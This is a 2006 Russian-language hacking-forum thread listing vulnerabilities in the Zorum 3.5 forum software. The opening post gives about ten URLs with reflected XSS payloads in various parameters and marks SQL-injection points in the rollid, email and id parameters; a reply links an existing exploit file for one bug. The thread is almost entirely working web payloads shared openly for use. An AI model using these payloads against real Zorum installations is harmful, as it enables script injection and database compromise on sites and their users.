Форумы XSS(passive) & SQL-inj в Zorum 3.5

Discussion in 'Уязвимости CMS/форумов' started by _kREveDKo_, 15 Apr 2006.

  1. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    Поставил, вот, на локалку, помучал и нашёл:

    (если что-то уже есть в паблике - извиняйте, я не проверял...)


    _http://localhost/zorum/index.php?method=userfunctions&list=<script>alert("lol");</script>
    _http://localhost/zorum/index.php?method=<script>alert("lol");</script>
    _http://localhost/zorum/index.php?method=showdetails&list=<script>alert("lol");</script>
    _http://localhost/zorum/index.php?method=showhtmllist&list=topic&rollid=[_S_Q_L__H_E_R_E_]
    _http://localhost/zorum/index.php?method=create_form&list=<script>alert("lol");</script>
    _http://localhost/zorum/index.php?inf=<script>alert("lol");</script>
    _http://localhost/zorum/index.php?method=login_form&list=<script>alert("lol");</script>
    _http://localhost/zorum/index.php?method=markread&list=zorumuser&fromlist=secmenu&frommethod=<script>alert("lol");</script>
    _http://localhost/zorum/index.php?method=remind_password_form&list=<script>alert("lol");</script>
    _http://localhost/zorum/index.php?method=remind_password&list=zorumuser&fromlist=forum&frommethod=showhtmllist&email=[_S_Q_L__H_E_R_E_]&submit=Ok
    _http://localhost/zorum/index.php?method=showattach&id=14[_S_Q_L__H_E_R_E_]
     
    #1 _kREveDKo_, 15 Apr 2006
    Last edited: 15 Apr 2006
    1 person likes this.
  2. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    4) Вроде была такая бага... __http://rst.void.ru/download/r57zor.txt
     
    _________________________